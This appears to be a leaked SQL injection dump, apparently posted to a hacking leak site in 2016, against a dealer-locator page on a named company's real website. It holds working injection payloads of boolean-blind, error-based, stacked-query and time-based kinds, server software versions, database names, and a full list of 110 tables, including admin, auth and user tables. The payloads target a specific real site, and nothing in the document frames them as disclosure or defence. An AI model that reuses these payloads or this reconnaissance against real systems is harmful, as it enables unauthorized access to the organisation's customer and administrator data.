Parameter: http://www.singerco.com/locations/dealer-locator?id=2101 (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=2101 AND 5128=5128

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=2101 AND (SELECT 9656 FROM(SELECT COUNT(*),CONCAT(0x716a766271,(SELECT (ELT(9656=9656,1))),0x71707a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: stacked queries
    Title: MySQL < 5.0.12 stacked queries (heavy query - comment)
    Payload: id=2101;SELECT BENCHMARK(5000000,MD5(0x6657556e))#

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=2101 AND SLEEP(5)
---
web application technology: PHP 5.2.13, Apache 2.2.15
back-end DBMS: MySQL >= 5.0
available databases [3]:
[*] dealerweb
[*] dealerweb_beta
[*] information_schema

Database: dealerweb
[110 tables]
+---------------------------+
| _temp_dealer_survey       |
| language                  |
| transaction               |
| user                      |
| acc_category              |
| activity                  |
| admin                     |
| attribute_choice          |
| auth                      |
| auth_content_block        |
| category                  |
| content                   |
| content_block             |
| content_compatible_list   |
| country                   |
| coupon                    |
| course                    |
| dealer                    |
| dealer_product            |
| diy                       |
| download                  |
| event                     |
| faq                       |
| faq_cat_list              |
| faq_machine               |
| history                   |
| homepage_bubble           |
| homepage_header           |
| incl_pfoot                |
| instr_material            |
| instr_material_list       |
| legal                     |
| library                   |
| location                  |
| location_canada           |
| machine_accessory         |
| machine_category          |
| machine_category_list     |
| machine_group_accessory   |
| machine_group_product     |
| machine_groups            |
| mail_list                 |
| menu_assets               |
| menu_banners              |
| migration_version         |
| nav                       |
| new_accessories           |
| new_accessory_category    |
| new_accessory_images      |
| new_products_dev          |
| new_products_live         |
| new_retailer              |
| news                      |
| orderline                 |
| package_history           |
| parts_transaction         |
| pfoot_cat_list            |
| product_activity          |
| product_category          |
| product_image             |
| product_language          |
| product_skill             |
| product_subcategory       |
| product_support_download  |
| products                  |
| project_image             |
| project_type_list         |
| province                  |
| quickstats                |
| retailer                  |
| retailer_list             |
| review                    |
| review_attribute          |
| sb_commentmeta            |
| sb_comments               |
| sb_links                  |
| sb_options                |
| sb_postmeta               |
| sb_posts                  |
| sb_term_relationships     |
| sb_term_taxonomy          |
| sb_termmeta               |
| sb_terms                  |
| sb_usermeta               |
| sb_users                  |
| settings                  |
| sf_guard_group            |
| sf_guard_group_permission |
| sf_guard_permission       |
| sf_guard_remember_key     |
| sf_guard_user             |
| sf_guard_user_group       |
| sf_guard_user_permission  |
| sf_guard_user_profile     |
| singerco_orderline        |
| singerco_product          |
| singerco_transaction      |
| skill                     |
| spotlight                 |
| state                     |
| subcategory               |
| tax_state                 |
| user_answer               |
| user_comment              |
| user_marketing            |
| user_product_reg          |
| user_question             |
| warranty                  |
| zipcode                   |
| zipcode_canada            |
+---------------------------+

https://twitter.com/north198181
 


# siph0n [2016-08-22]